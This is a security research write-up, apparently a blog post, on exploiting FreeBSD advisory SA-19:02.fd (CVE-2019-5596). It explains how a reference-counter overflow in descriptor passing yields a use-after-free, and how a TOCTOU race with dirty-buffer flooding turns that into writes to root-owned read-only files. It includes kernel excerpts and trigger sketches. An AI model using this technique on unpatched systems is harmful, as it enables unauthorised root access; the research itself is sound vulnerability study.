Exploiting FreeBSD-SA-19:02.fd
Introduction
In February 2019 the FreeBSD project issued an advisory about a possible vulnerability in the handling of file descriptors.
UNIX-like systems such as FreeBSD allow file descriptors to be sent to other processes via UNIX-domain sockets. This can, for example, be used to pass file access privileges to the receiving process.
Inside the kernel, file descriptors are used to indirectly reference a C struct which stores the relevant information about the file object. This could for instance include a reference to a vnode which describes the file for the file system, the file type, or the access privileges.
What really happens when a UNIX-domain socket is used to send a file descriptor to another process is that a new reference to this struct is created inside the kernel for the receiving process. As the new file descriptor is a reference to the same file object, all information is inherited. For instance, this makes it possible to give another process write access to a file on the drive even if the process owner is normally not able to open the file for writing.
The advisory describes that FreeBSD 12.0 introduced a bug in this mechanism. As the file descriptor information is sent via a socket, the sender and the receiver have to allocate buffers for the procedure. If the receiving buffer is not large enough, the FreeBSD kernel attempts to close the received file descriptors to prevent a leak of these to the sender. However, while the responsible function closes the file descriptor, it fails to release the reference from the file descriptor to the file object. This could cause the reference counter to wrap.
The advisory further states that the impact of this bug is possibly a local privilege escalation to gain root privileges or a jail escape. However, no proof-of-concept was provided by the advisory authors.
This blog post catches up on that and describes Secfault Security’s research to exploit the bug in order to obtain a privilege escalation to root.
In the next section, the bug itself is analyzed to make a statement about the bug class and a guess about a possible exploitation primitive.
After that, the bug trigger is addressed.
This is followed by a discussion of three conceivable exploitation strategies, including a discussion of why two of these approaches failed.
In the penultimate section, the working exploit primitive is discussed. It introduces an exploitation technique for this kind of vulnerability in FreeBSD that is, at least to the author’s knowledge, new. The stabilization of the exploit is addressed, too.
The last section wraps everything up in a conclusion and points out further steps and challenges.
Furthermore, there is an appendix, which describes the test setup and kernel patches to accelerate the exploit conditions for testing.
It should be mentioned that the vulnerability was backported to the FreeBSD 11 development branch. However, the vulnerability was fixed in this branch, too, so it will not be present in the 11.3-release.
The issue has an assigned CVE which is CVE-2019-5596.
NB: All references to code lines are referring to the vulnerable source tree which was shipped with the initial FreeBSD 12 release. The source code can be found here if not otherwise mentioned.
All PoC code can be downloaded here.
Bug Analysis
To get a first hint about the origin of the bug, a look into the patch in revision r343790 of the FreeBSD 12 release engineering branch is a good start. This revision was mentioned in the advisory. It can be found in FreeBSD’s Phabricator instance. The fix from this revision is the following:
1578 void
1579 m_dispose_extcontrolm(struct mbuf *m)
1580 {
...
1606 while (nfd-- > 0) {
1607 fd = *fds++;
1608 error = fget(td, fd, &cap_no_rights,
1609 &fp);
- 1610 if (error == 0)
+ 1610 if (error == 0) {
1611 fdclose(td, fp, fd);
+ 1612 fdrop(fp, td);
+ 1613 }
1614 }
...
1621 }
Only a single call in the function m_dispose_extcontrolm() in the file uipc_syscalls.c was added. The bug therefore existed because the function lacked a call to the macro fdrop(). So the natural question is: What is the purpose of this macro?
fdrop() has two arguments, fp and td. The latter is just a kernel pointer to the current thread. The former is a pointer to a struct file object, which is defined in line 170 of sys/sys/file.h.
170 struct file {
171 void *f_data; /* file descriptor specific data */
172 struct fileops *f_ops; /* File operations */
173 struct ucred *f_cred; /* associated credentials. */
174 struct vnode *f_vnode; /* NULL or applicable vnode */
175 short f_type; /* descriptor type */
176 short f_vnread_flags; /* (f) Sleep lock for f_offset */
177 volatile u_int f_flag; /* see fcntl.h */
178 volatile u_int f_count; /* reference count */
179 /*
180 * DTYPE_VNODE specific fields.
181 */
182 int f_seqcount; /* (a) Count of sequential accesses. */
183 off_t f_nextoff; /* next expected read/write offset. */
184 union {
185 struct cdev_privdata *fvn_cdevpriv;
186 /* (d) Private data for the cdev. */
187 struct fadvise_info *fvn_advice;
188 } f_vnun;
189 /*
190 * DFLAG_SEEKABLE specific fields
191 */
192 off_t f_offset;
193 /*
194 * Mandatory Access control information.
195 */
196 void *f_label; /* Place-holder for MAC label. */
197 };
fdrop() itself is a macro, which first calls refcount_release(). This function atomically decrements f_count (line 178 of the struct definition) by 1 and returns 1 if f_count was less than or equal to 1 before the function was called, or 0 otherwise. If the return value is indeed 1, the macro calls _fdrop() with all its arguments.
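The behaviour just described can be modelled in user space. The following is a simplified sketch and not the kernel source: struct model_file, model_refcount_release() and model_fdrop() are hypothetical names, and the freed flag merely stands in for the call to _fdrop().

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct file; only the reference count matters. */
struct model_file {
	atomic_uint f_count;	/* reference count */
	bool freed;		/* set where the kernel would call _fdrop() */
};

/* Decrement the counter; report 1 if the old value was <= 1, else 0. */
int
model_refcount_release(atomic_uint *count)
{
	unsigned int old = atomic_fetch_sub(count, 1);

	return (old <= 1);
}

/* Model of the fdrop() macro: release one reference, free on the last one. */
int
model_fdrop(struct model_file *fp)
{
	assert(fp != NULL);
	if (!model_refcount_release(&fp->f_count))
		return (0);
	fp->freed = true;	/* the kernel would call _fdrop(fp, td) here */
	return (1);
}
```

With a counter of 2, the first model_fdrop() only decrements, while the second one reports that the object would be freed.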
_fdrop() itself is defined in sys/kern/kern_descrip.c.
2943 int __noinline
2944 _fdrop(struct file *fp, struct thread *td)
2945 {
2946 int error;
2947
2948 if (fp->f_count != 0)
2949 panic("fdrop: count %d", fp->f_count);
2950 error = fo_close(fp, td);
2951 atomic_subtract_int(&openfiles, 1);
2952 crfree(fp->f_cred);
2953 free(fp->f_advice, M_FADVISE);
2954 uma_zfree(file_zone, fp);
2955
2956 return (error);
2957 }
The interesting line is 2954. Here, uma_zfree() is called. This is an internal kernel function which frees an allocated chunk on the heap. It is beyond the scope of this document to discuss the details of the kernel’s heap management. The inner workings of the kernel allocator are described by argp and karl in Phrack #0x42, Phile #0x08. Another great resource is the book “The Design and Implementation of the FreeBSD Operating System” by McKusick et al.
For the purpose of this blog post, the following knowledge about the kernel heap is sufficient: The FreeBSD kernel’s heap allocator allows the definition of “zones”. Each zone is used to manage page chunks of a specific size by creating “buckets”. To allocate a chunk on the kernel’s heap, uma_zalloc() has to be called with a parameter which specifies the zone. The function returns a pointer to a chunk which is taken from a bucket of that zone. If the bucket is empty, a new page is allocated for that zone and chopped into the zone’s chunk size.
For example, the zone socket is used to allocate chunks of size 872 bytes, which the kernel uses as heap space for socket objects. There are anonymous zones, too, like 256, which are used by calls to malloc() in the kernel.
It is possible to view all available zones including their stats with the command vmstat -z.
When a heap chunk is freed via uma_zfree() by the kernel, it will be put back into the zone’s bucket. Subsequent calls to malloc() or uma_zalloc() will attempt to take chunks from such buckets in a LIFO fashion.
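The LIFO behaviour is what makes a freed chunk come back on the next allocation. The following toy allocator is only an illustration of that property; struct toy_zone, toy_zalloc() and toy_zfree() are hypothetical names, and the real allocator (per-CPU caches, multiple buckets, slabs) is considerably more involved.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_ZONE_ITEMS 4

/* Hypothetical toy zone: fixed-size chunks plus a LIFO stack of free ones. */
struct toy_zone {
	char chunks[TOY_ZONE_ITEMS][64];
	void *free_stack[TOY_ZONE_ITEMS];
	size_t nfree;
};

/* Mark every chunk of the zone as free. */
void
toy_zone_init(struct toy_zone *z)
{
	assert(z != NULL);
	z->nfree = 0;
	for (size_t i = 0; i < TOY_ZONE_ITEMS; i++)
		z->free_stack[z->nfree++] = z->chunks[i];
}

/* Take the most recently freed chunk, or NULL if the zone is exhausted. */
void *
toy_zalloc(struct toy_zone *z)
{
	if (z->nfree == 0)
		return (NULL);
	return (z->free_stack[--z->nfree]);
}

/* Put a chunk back on top of the stack. */
void
toy_zfree(struct toy_zone *z, void *item)
{
	assert(z->nfree < TOY_ZONE_ITEMS);
	z->free_stack[z->nfree++] = item;
}
```

Freeing a chunk and allocating again from the same toy zone returns the same address, which is the property the rest of the analysis relies on.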
For the moment, the interesting insights are:
- uma_zfree() is called with file_zone
- file_zone refers to a special zone called Files for the struct file type
- If another function allocates a struct file from Files, it will eventually receive the pointer that was freed by _fdrop()
A last observation is the following: fdclose() calls fdrop(), too, in line 2384 of its implementation in sys/kern/kern_descrip.c.
2376 fdclose(struct thread *td, struct file *fp, int idx)
2377 {
2378 struct filedesc *fdp = td->td_proc->p_fd;
2379
2380 FILEDESC_XLOCK(fdp);
2381 if (fdp->fd_ofiles[idx].fde_file == fp) {
2382 fdfree(fdp, idx);
2383 FILEDESC_XUNLOCK(fdp);
2384 fdrop(fp, td);
2385 } else
2386 FILEDESC_XUNLOCK(fdp);
2387 }
As the description of the bug mentions the wrapping of a reference counter, one can see that the lack of a second fdrop() leads to an overflow of the reference counter f_count in the respective struct file. This could ultimately lead to a use-after-free vulnerability [1].
To clarify this, we’ll investigate the exact purpose of m_dispose_extcontrolm() and the vulnerable path.
The Vulnerable Path
m_dispose_extcontrolm() was introduced for a single purpose, as is described here: It is possible to send file descriptors via a UNIX-domain socket. This is done by the function sendmsg(), which allows so-called control data to be put into the message [2]. File descriptors are sent by using the control message type SCM_RIGHTS.
However, it was observed quite a while ago that file descriptors do leak if the receiver’s buffer is too small. The bug entry’s comments state that if the receiving buffer is not big enough, the receiving process has to close the already opened file descriptors, due to the fact that not all descriptors are received. However, as the already received file descriptors are processed and the references to the file objects are created (as mentioned in the introduction), these file descriptors are leaked if the close does not happen.
Therefore, the new function m_dispose_extcontrolm() was introduced to resolve this issue. Reviewing line 998 ff. of kern_recvit() in sys/kern/uipc_syscalls.c shows the call in line 1033.
902 int
903 kern_recvit(struct thread *td, int s, struct msghdr *mp, enum uio_seg fromseg,
904 struct mbuf **controlp)
905 {
...
998 if (mp->msg_control && controlp == NULL) {
999 #ifdef COMPAT_OLDSOCK
...
1018 #endif
1019 ctlbuf = mp->msg_control;
1020 len = mp->msg_controllen;
1021 mp->msg_controllen = 0;
1022 for (m = control; m != NULL && len >= m->m_len; m = m->m_next) {
1023 if ((error = copyout(mtod(m, caddr_t), ctlbuf,
1024 m->m_len)) != 0)
1025 goto out;
1026
1027 ctlbuf += m->m_len;
1028 len -= m->m_len;
1029 mp->msg_controllen += m->m_len;
1030 }
1031 if (m != NULL) {
1032 mp->msg_flags |= MSG_CTRUNC;
1033 m_dispose_extcontrolm(m);
1034 }
1035 }
Ultimately, this path is followed if a message containing file descriptors in the control part is sent, but the recvmsg() used to receive this message does not expect any control messages at all. This will trigger m_dispose_extcontrolm(), as len in line 1020 will be 0 but m->m_len will be bigger. Hence, the loop in line 1022 is not executed, but m is not NULL because there is a control message in the sent message.
That is, to call m_dispose_extcontrolm(), the following has to be done:
- Create a UNIX-domain socket
- Allocate a buffer which is big enough to send a message via the socket with a contained file descriptor
- Allocate a buffer which is not big enough to receive a message via the socket which contains a file descriptor
- Send the message with sendmsg()
- Receive the message with recvmsg()
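These steps can be sketched with the standard socket API. The sketch below is an illustration under stated assumptions and not the author’s trigger_uaf.c: send_fd() and recv_without_control_space() are hypothetical helper names. It sends a single descriptor once and receives the message with a control buffer of length 0. The control pointer is kept non-NULL because the check in line 998 tests mp->msg_control.

```c
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>

/* Send one byte of data plus the descriptor fd as SCM_RIGHTS control data. */
int
send_fd(int sock, int fd)
{
	char data = 'x';
	struct iovec iov = { .iov_base = &data, .iov_len = 1 };
	union {
		struct cmsghdr hdr;	/* forces suitable alignment */
		char buf[CMSG_SPACE(sizeof(int))];
	} ctl;
	struct msghdr msg;
	struct cmsghdr *cmsg;

	memset(&ctl, 0, sizeof(ctl));
	memset(&msg, 0, sizeof(msg));
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = ctl.buf;
	msg.msg_controllen = sizeof(ctl.buf);

	cmsg = CMSG_FIRSTHDR(&msg);
	assert(cmsg != NULL);
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
	memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

	return (sendmsg(sock, &msg, 0) == 1 ? 0 : -1);
}

/*
 * Receive the message with a control buffer of length 0.
 * Returns msg_flags on success or -1 if recvmsg() failed.
 */
int
recv_without_control_space(int sock)
{
	char data;
	char ctlbuf[1];
	struct iovec iov = { .iov_base = &data, .iov_len = 1 };
	struct msghdr msg;

	memset(&msg, 0, sizeof(msg));
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = ctlbuf;	/* non-NULL control pointer */
	msg.msg_controllen = 0;		/* but no room for a control message */

	if (recvmsg(sock, &msg, 0) < 0)
		return (-1);
	return (msg.msg_flags);
}
```

When the kernel has to discard the control data, the returned flags contain MSG_CTRUNC, which corresponds to line 1032 of the listing above. On a patched kernel this round trip is harmless.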
Now, the bug itself can be reviewed. For this, line 1606 ff. of m_dispose_extcontrolm() has to be taken into view again.
1578 void
1579 m_dispose_extcontrolm(struct mbuf *m)
1580 {
...
1606 while (nfd-- > 0) {
1607 fd = *fds++;
1608 error = fget(td, fd, &cap_no_rights,
1609 &fp);
1610 if (error == 0)
1611 fdclose(td, fp, fd);
1612 }
The interesting part is the call to fget(). This function eventually results in a call to fget_unlocked(), which extracts the pointer to a struct file object from the file descriptor fd, saves the address in the pointer fp and increments the reference counter f_count of the struct file object by 1. However, sending a file descriptor already increases the reference counter because the receiver holds, with its own file descriptor, a reference to the same struct file object. In total, the reference counter is therefore increased by 2.
In the end, fdclose() in line 1611 closes the receiver’s file descriptor and therefore removes a reference to the struct, but does not take into account that f_count was increased by 2 in total due to the call to fget().
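The bookkeeping of one round trip through this path can be written down as plain arithmetic. The function below is a hypothetical model (model_dispose_round() is not a kernel function); it only replays the increments and decrements described above for the vulnerable and the patched variant.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/*
 * Hypothetical model of one send/receive round trip through the dispose
 * path. Returns the reference count after the round trip.
 */
uint32_t
model_dispose_round(uint32_t f_count, bool patched)
{
	assert(f_count >= 1);	/* a live file has at least one reference */

	f_count += 1;		/* the receiver's descriptor references the file */
	f_count += 1;		/* fget() takes a temporary reference */
	f_count -= 1;		/* fdclose() drops the descriptor's reference */
	if (patched)
		f_count -= 1;	/* fdrop() added by the fix */
	return (f_count);
}
```

Starting from a count of 2, the vulnerable variant ends at 3 while the patched variant returns to 2.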
Therefore, the function results in a primitive that can increase f_count by 1. Because f_count is of the type u_int, which has a size of 32 bits, an overflow of this variable is possible in a reasonable time. This is done by just iterating the primitive to increase f_count until the result would need more than 32 bits to represent it in memory. All bits above the 32nd bit are then discarded and the variable wraps back to 0 again.
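The wrap can be checked with ordinary unsigned arithmetic. The helpers below are hypothetical and only illustrate the modulo-2^32 behaviour; they assume the counter starts at 2 (one open() plus one dup()) and should end at 1.

```c
#include <assert.h>
#include <stdint.h>

/* Apply n increments of 1 to a 32-bit counter; the result wraps modulo 2^32. */
uint32_t
apply_increments(uint32_t count, uint32_t n)
{
	return (count + n);
}

/* Number of +1 steps needed to move a 32-bit counter from start to target. */
uint32_t
increments_needed(uint32_t start, uint32_t target)
{
	/* Unsigned subtraction is performed modulo 2^32 as well. */
	uint32_t n = target - start;

	assert(apply_increments(start, n) == target);
	return (n);
}
```

For start 2 and target 1, the result is 2^32 - 1 net increments, i.e. UINT32_MAX.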
If this is used to overflow f_count to 1, then it is possible to create a use-after-free scenario. To achieve this, the sending process needs to hold two file descriptors to the same struct file, which can be done by duplicating one file descriptor with dup(). Now, if one of the file descriptors is closed after the overflow, fdrop() is called. As this call will only see that f_count is 1, the struct file object will be freed as explained above. However, it is still possible to reference the freed chunk via the second, still opened file descriptor.
Now that the general idea is clarified and because this part is so important, it should be described in more detail how to trigger the vulnerability as there are some wrinkles to address.
First, a file is opened with open() and the file descriptor is duplicated with dup(). This results in two file descriptors, which reference the same struct file object. Hence, f_count is 2.
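That both descriptors share one file object can be observed from user space, because the file offset lives in that object. The following sketch uses a hypothetical helper, dup_shares_offset(), and a temporary file under /tmp as an assumption; it does not touch the vulnerability itself.

```c
#define _POSIX_C_SOURCE 200809L	/* expose mkstemp() under strict ISO C modes */
#include <assert.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Returns 1 if a write through fd moves the offset seen through a dup()
 * of it, 0 if not, and -1 if the setup failed.
 */
int
dup_shares_offset(void)
{
	char path[] = "/tmp/dup_demo.XXXXXX";
	int fd, fd2, shared;

	fd = mkstemp(path);
	if (fd < 0)
		return (-1);
	unlink(path);		/* the file lives on until both fds are closed */

	fd2 = dup(fd);
	if (fd2 < 0) {
		close(fd);
		return (-1);
	}
	assert(fd != fd2);	/* two descriptors, one file object */

	if (write(fd, "abcdef", 6) != 6) {
		close(fd);
		close(fd2);
		return (-1);
	}
	/* The offset is stored in the shared file object, not per descriptor. */
	shared = (lseek(fd2, 0, SEEK_CUR) == 6);

	close(fd);
	close(fd2);
	return (shared);
}
```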
Next, m_dispose_extcontrolm() is triggered repeatedly, as described above, to overflow f_count and finally set it to 1 again. This has some quirks, though. For one, it is not possible to send an arbitrary number of file descriptors. This is the case because each file descriptor needs some space in the message to send, but the kernel internally only has a limited number of so-called mbufs available, which build up the message for further processing.
Luckily enough, sending the file descriptor more than once via the socket will increase the reference counter multiple times before m_dispose_extcontrolm() is called to decrement the counter.
Due to this, the preparation of the use-after-free needs some time. On the virtual machine used for this research, this took around 20 minutes [3].
Moreover, it is important to note that the overflow has to result in f_count == 1 and not 0, because if fdrop() is called with f_count == 0 it will result in a kernel panic. This is because refcount_release() only checks if the decremented counter is 0 or less to signal the free, but _fdrop() asserts that f_count is exactly 0. If the counter is negative, _fdrop() triggers the panic [4].
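The three possible outcomes of dropping a reference can be summarised in a small model. This is a hypothetical user-space sketch (enum drop_result and model_drop() are made-up names) that replays the decrement and the check at the top of _fdrop() on a plain 32-bit counter.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum drop_result { DROP_KEEP, DROP_FREE, DROP_PANIC };

/* Hypothetical model of fdrop() followed by the check at the top of _fdrop(). */
enum drop_result
model_drop(uint32_t *f_count)
{
	uint32_t old;

	assert(f_count != NULL);
	old = (*f_count)--;		/* fetch the old value, then decrement */
	if (old > 1)
		return (DROP_KEEP);	/* other references remain */
	if (*f_count != 0)
		return (DROP_PANIC);	/* counter wrapped below zero */
	return (DROP_FREE);		/* last reference, object is freed */
}
```

A counter of 2 is merely decremented, a counter of 1 leads to the free, and a counter of 0 wraps around and hits the panic branch.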
After wrapping f_count to the value 1, one of the file descriptors is “manually” closed. This will trigger the free because f_count will decrement to 0, thus _fdrop() is called. The result is that the struct file object is released to the Files zone’s bucket. Due to the former dup(), the second file descriptor still references the freed struct file object but is now invalid, as the object itself is marked as invalid.
Here is another quirk: Other syscalls like read() or write() which use a struct file will result in a call to fget_unlocked(). This function will check that the used file descriptor is not greater than the greatest valid one, though. Therefore, the first file descriptor has to be closed because the duplicated one is typically greater.
So far we have obtained a file descriptor that references an invalid struct file. Once the memory of this struct file is re-used by another call to open(), our “dangling” file descriptor will actually become valid again. However, it will then point to the newly opened file. The dangling file descriptor can be used for the same operations as the newly opened one. Because they share the same struct file, all rights of the newly opened file descriptor are inherited by the dangling one. E.g., if the first file was opened read-only but the second one writable, the dangling file descriptor can be used to write to the newly opened file.
How this could be exploited will be described in the next section and the one after that.
To sum the trigger strategy up:
- Open a file with open()
- Duplicate the file descriptor with dup()
- Overflow f_count to 1 by calling m_dispose_extcontrolm()
- Close the first file descriptor to trigger the free
- Call open() again to allocate another struct file from the Files zone, resulting in a dangling file descriptor to that object
A first proof-of-concept can be found in trigger_uaf.c. It is notable that it will result in a kernel panic when the program is closed. This will be addressed in the final exploit. The interested reader can try to figure out the solution before continuing to read.
Exploitation Strategies
This section will discuss three possible exploitation strategies, two of which failed during the research.
Utilizing a suid Program
One of the simplest strategies is the following: Is it possible to trigger the use-after-free and execute some suid program like passwd after that, resulting in a dangling file descriptor to a file owned by root, including all capabilities?
An exploit would need to place the struct file object exactly into the Files zone bucket where needed. If the suid program opens a file owned by root like master.passwd or libmap.conf writable, it could be possible to write to this file from the user context.
In theory this strategy works. A proof-of-concept can be found in the files setuid_test_client.c and setuid_test_server.c (NB: The compiled setuid_test_server.c has to be root-owned and suid, of course).
However, finding such a program turned out to be trickier than expected. Most utilities in the standard installation open interesting files read-only or close them too fast.
Therefore this approach was dropped early.
Memory Corruption
Another typical approach would be to find some way of corrupting the kernel’s memory in order to simply execute user-provided code. This could mean overwriting, e.g., a function pointer inside the struct file object or another object which could be indirectly referenced by the struct file object.
Indeed, fail0verflow used a very similar technique to exploit a vulnerability in the PlayStation 4 operating system, which is based on FreeBSD 9. They opened a kqueue, which is a FreeBSD mechanism to monitor kernel events.
kqueue files utilize the f_data pointer of struct file to manage the kqueue. The heap space is allocated from one of the anonymous zones. Therefore it is possible to spray into that zone via ioctl() and overwrite a function pointer as described in the blog post.
There is a significant difference between the vulnerability used by fail0verflow and the one researched in this work, though: The former allowed an arbitrary free, e.g., of the f_data pointer. The latter only allows freeing a struct file. As the kernel cleans up all interesting struct fields and pointers, it is not possible to use fail0verflow’s primitives.
During the research all other possible objects which rely on struct file were investigated, but none allowed the vulnerability to be exploited via memory corruption, for the reason just described.
Exchange the File Object During write()
This is a variation of our first strategy.
The FreeBSD kernel checks if a file is opened writable as soon as a user tries to write via a file descriptor. If the check is passed, the write operation is prepared and executed. This basically creates a Time-of-Check-Time-of-Use (TOCTOU) scenario.
The idea is the following: The time window between the passed check and the write operation itself creates a race condition. It should be possible to free the struct file object via the described vulnerability and immediately open another file which is normally read-only for the user. Because the write check is already done, the write operation will be executed but happen on the read-only file because the struct file was exchanged.
As this strategy was finally successfully used to exploit the use-after-free to gain root access, it is described in detail in the next section.
It should be mentioned that Jann Horn of Google’s Project Zero exploited a similar vulnerability in Linux and used a similar approach. This is described in a posting from 2016 on the Project Zero bug tracker.
Escalate to root
As described in the last section, the strategy is basically a Time-of-Check-Time-of-Use (TOCTOU) attack: write() is called for a file which is writable by the user. The syscall will first check if the file referenced by the file descriptor is indeed writable by the user or result in an error otherwise. After the check is passed, the use-after-free vulnerability is triggered and a root-owned read-only file is opened by the user right after that.
The check works the following way: the write() syscall results in a call of the kernel function sys_write() in sys/kern/sys_generic.c. Subsequently, kern_writev() in the same file is called, which then calls fget_write(). The latter is defined in sys/kern/kern_descrip.c. This function is used to retrieve the struct file object for the file descriptor and checks for write capability.
To do this, the function calls _fget() in the same file.
2716 static __inline int
2717 _fget(struct thread *td, int fd, struct file **fpp, int flags,
2718 cap_rights_t *needrightsp, seq_t *seqp)
2719 {
2720 struct filedesc *fdp;
2721 struct file *fp;
2722 int error;
2723
2724 *fpp = NULL;
2725 fdp = td->td_proc->p_fd;
2726 error = fget_unlocked(fdp, fd, needrightsp, &fp, seqp);
...
2738 switch (flags) {
2739 case FREAD:
2740 case FWRITE:
2741 if ((fp->f_flag & flags) == 0)
2742 error = EBADF;
2743 break;
...
2753 }
2754
2755 if (error != 0) {
2756 fdrop(fp, td);
2757 return (error);
2758 }
2759
2760 *fpp = fp;
2761 return (0);
2762 }
The check can be seen in line 2741. f_flag is a field in struct file, set by the first call to open() for the file. A call to write() will result in a check that the FWRITE bit is set. The bit is only set if the user has write privileges for the opened file.
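The effect of this check is visible from user space: a write() through a descriptor that was opened read-only fails with EBADF, regardless of the permissions on the file itself. The helper below, write_result_for_flags(), is a hypothetical name, and the temporary file under /tmp is an assumption of this sketch.

```c
#define _POSIX_C_SOURCE 200809L	/* expose mkstemp() under strict ISO C modes */
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Create a temporary file, reopen it with open_flags and try to write one
 * byte. Returns 0 if the write succeeded, the errno of write() if it
 * failed, or -1 if the setup failed.
 */
int
write_result_for_flags(int open_flags)
{
	char path[] = "/tmp/fwrite_demo.XXXXXX";
	int fd, tmpfd, result;

	assert((open_flags & O_CREAT) == 0);	/* the file already exists */

	tmpfd = mkstemp(path);
	if (tmpfd < 0)
		return (-1);
	close(tmpfd);

	fd = open(path, open_flags);
	if (fd < 0) {
		unlink(path);
		return (-1);
	}
	result = (write(fd, "x", 1) == 1) ? 0 : errno;
	close(fd);
	unlink(path);
	return (result);
}
```

Calling the helper with O_RDONLY yields EBADF, the same error that line 2742 sets, while O_WRONLY yields 0.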
The following should be noted: If it is assumed that the use-after-free is already prepared at that moment, that is, the f_count variable was overflowed to 1, the call to fget_unlocked() does increase f_count to 2. The counter will be decreased to 1 again at the end of the write() operation.
However, if the check is successfully passed, it is possible to exchange the file object via the use-after-free plus another call to open() for a read-only file. The write will then happen to the second file. A first proof-of-concept can be found in test_rd_only_write.c (note that a kernel patch is needed for that test as noted in the comment at the beginning of the file; see the appendix for more information).
After the check is passed, kern_writev() will call dofilewrite() in the same file.
545 static int
546 dofilewrite(struct thread *td, int fd, struct file *fp, struct uio *auio,
547 off_t offset, int flags)
548 {
...
564 if (fp->f_type == DTYPE_VNODE &&
565 (fp->f_vnread_flags & FDEVFS_VNODE) == 0)
566 bwillwrite();
567 if ((error = fo_write(fp, auio, td->td_ucred, flags, td))) {
...
576 }
577 }
...
587 }
This function has two interesting function calls. The first one is to fo_write() in line 567. This function will eventually result in the write operation. That is, it is safe to assume that the file exchange has to happen before this function is called [5].
This race is quite tight, though, and not likely to be won without any other primitive. Moreover, the race has to be won at the first try because otherwise the kernel will panic.
This is the case because it is assumed, as mentioned above, that f_count is 2 at the moment of the passed check. Therefore, close() has to be called twice. But if the check is not yet passed or write() has already finished, f_count is still 1. _fdrop() will assert that the reference counter is exactly 0, though, but two closes would result in a negative reference counter because the function interprets the counter as a signed integer. The panic would be the result of the failed assertion.
Jann Horn could delay the Linux kernel operations by writing a FUSE file system which delays write operations to increase the success rate to win this race condition. This is not possible in a standard FreeBSD installation because FUSE cannot be assumed to be loaded (and to be available to the respective user).
Here, the call to bwillwrite() in line 566 comes to help. This function and the function buf_dirty_count_severe() are defined in sys/kern/vfs_bio.c.
2564 bwillwrite(void)
2565 {
2566
2567 if (buf_dirty_count_severe()) {
2568 mtx_lock(&bdirtylock);
2569 while (buf_dirty_count_severe()) {
2570 bdirtywait = 1;
2571 msleep(&bdirtywait, &bdirtylock, (PRIBIO + 4),
2572 "flswai", 0);
2573 }
2574 mtx_unlock(&bdirtylock);
2575 }
2576 }
2577
2578 /*
2579 * Return true if we have too many dirty buffers.
2580 */
2581 int
2582 buf_dirty_count_severe(void)
2583 {
2584
2585 return (!BIT_EMPTY(BUF_DOMAINS, &bdhidirty));
2586 }
The line that immediately catches the eye is line 2571, which calls msleep(). As can be read in the man page of that function [6], this will put the thread to sleep without a timeout. A check of the wakeup channel bdirtywait shows that the thread will be woken up by bdirtywakeup(), which itself is called by buf_daemon() from vfs_bio.c.
The condition for the call to msleep() and the purpose of buf_daemon() are connected: If the kernel holds too many dirty buffers (i.e., buffers that are waiting for their write operation), buf_dirty_count_severe() returns 1 and buf_daemon() is woken up to flush these in order to reduce the count. After that, bdirtywakeup() is called to wake up all write operations that are waiting at line 2571.
There are two kernel variables used as water marks to monitor if there are too many dirty buffers: lodirtybuffers and hidirtybuffers. These are set at boot time and depend on the available RAM [7]. If the number of dirty buffers is greater than hidirtybuffers, the bit bdhidirty (line 2585) is set and buf_dirty_count_severe() returns 1, thus resulting in the msleep() call.
Therefore a technique is needed to raise the number of dirty buffers fast. After some experimenting, an easy way was quickly identified: The exploit needs to open a vast number of file streams which all refer to the same file. However, after a file stream is opened with fopen(), the corresponding file is unlinked before the next call to fopen(). The number of dirty buffers will increase if the exploit attempts to write to all these file streams in parallel.
A demo for this technique can be found in test_dirty.c.
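The open-then-unlink pattern itself is easy to write down. The following is a reduced, sequential sketch and not a reproduction of test_dirty.c: write_unlinked_streams() is a hypothetical helper, the limits are arbitrary, and the parallel writer threads described above are left out.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAX_STREAMS 64

/*
 * Open up to n streams on the same path, unlinking the path after each
 * fopen(), then write len bytes to every stream. Returns the number of
 * streams that were written and flushed completely.
 */
int
write_unlinked_streams(const char *path, int n, size_t len)
{
	FILE *streams[MAX_STREAMS];
	char block[4096];
	int opened = 0, written = 0;

	assert(n >= 0 && n <= MAX_STREAMS && len <= sizeof(block));
	memset(block, 'A', sizeof(block));

	for (int i = 0; i < n; i++) {
		FILE *fp = fopen(path, "w");

		if (fp == NULL)
			break;
		unlink(path);	/* the name is free again for the next fopen() */
		streams[opened++] = fp;
	}
	for (int i = 0; i < opened; i++) {
		if (fwrite(block, 1, len, streams[i]) == len &&
		    fflush(streams[i]) == 0)
			written++;
		fclose(streams[i]);
	}
	return (written);
}
```

Each stream refers to a distinct, already unlinked file that was created under the same name, so no files are left behind after the streams are closed.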
The exploit now works as follows: Once the number of dirty buffers is high enough, another thread gets a signal to attempt the write to a previously opened, random file writable by the user. Simultaneously, a signal to yet another thread is given to trigger the use-after-free and open a file that is read-only for the user. The use-after-free is triggered by closing both the file descriptor used to prepare the use-after-free scenario and the duplicated one (remember that f_count equals 2 now). Opening the read-only file now will result in the exchange of the struct file object.
To increase the chance that the race is won by the exploit, the use-after-free trigger thread and the write thread run on different cores, if possible, and the use-after-free is delayed by some microseconds. If the latter is not done, the exploit will likely result in a kernel panic because the use-after-free happens too fast, resulting in the panic triggered by _fdrop() as described above.
A proof-of-concept for the arbitrary write can be found in arbitary_file_write. It should be noted that the hammer threads are synchronized. Otherwise the resulting load of “hammering”, still creating threads and triggering the vulnerability renders the exploit unreliable. Moreover, a synchronous write triggers the msleep() condition much faster.
There are still two challenges open for the final exploit: Gaining root and preventing the kernel panic.
The latter can be achieved by using the primitive which resulted in the reference counter overflow. The reason for the panic is that the program attempts to close all file descriptors it assumes open. Due to the use-after-free the reference counter is too small, though. Hence, the previously mentioned assertion in _fdrop() fails.
